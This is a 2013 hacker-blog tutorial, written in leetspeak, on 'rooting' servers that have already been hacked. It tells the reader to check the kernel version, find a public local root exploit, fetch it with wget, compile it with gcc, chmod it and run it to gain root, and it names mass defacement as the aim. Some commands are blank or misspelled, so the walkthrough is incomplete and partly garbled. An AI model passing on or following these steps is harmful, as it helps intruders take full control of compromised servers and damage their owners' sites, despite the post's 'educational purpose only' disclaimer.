Wednesday 12 June 2013

0 Server rooting Tutorial By Muhammad Bilal Pak Cyber Experts

[]Server rooting Tutorial By Muhammad Bilal Pak Cyber Experts

Today im Going To Sh0w y0uh..

h0w t0 r00t the server.. ;)

What is Rooting?
Getting access to the user ="r00t" Master,admin,main user blah bla..

root Server To Get Full Access To The server..

y0u can d0 many thing after r00ting the server..

Ex-: Mass Defacing 

1) hacked Server 2009/2010//2011/2012 ;) any of these..
2) Expl0it [Local r00t expl0it
3) and n0thing..


Open y0ur shell..

Check y0ur Kernel Version..
If its 2.6.18 2011, y0u can r00t it..
2.6.32 2012 y0u can als0 r00t that bit**
2010 and 2009 als0 r00table...

make dir :
mkdir tmp  /its always writable ;) 

Now give this command -
cd tmp

now, again make new dir ... in tmp dir..

mkdir b0x

now cd t0 b0x 
cd b0x

Now, Search For Expl0it..
 How To Search f0r Expl0!t?
Type This In Goo0gle.

2.6.18 2011 local r00t expl0it..
y0u'll get it.

n0w type: wget

We need t0 compile Expl0it:
f0r this type: gcc -o exploit eploit.c

Give This Command /
chmod 777 exploit

Then G!ve this Command:

it Will sh0w y0u:
g0t r00t mofo!
 To check y0u g0t r00t 0r not?

Type :


if its sh0w y0u:
mean y0u g0t root mofo :D

Expl0it Sites//                                      ||
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Note:- For Educational Purpose ONLY!!!!!!!!!!!
Enj0y.. ;)


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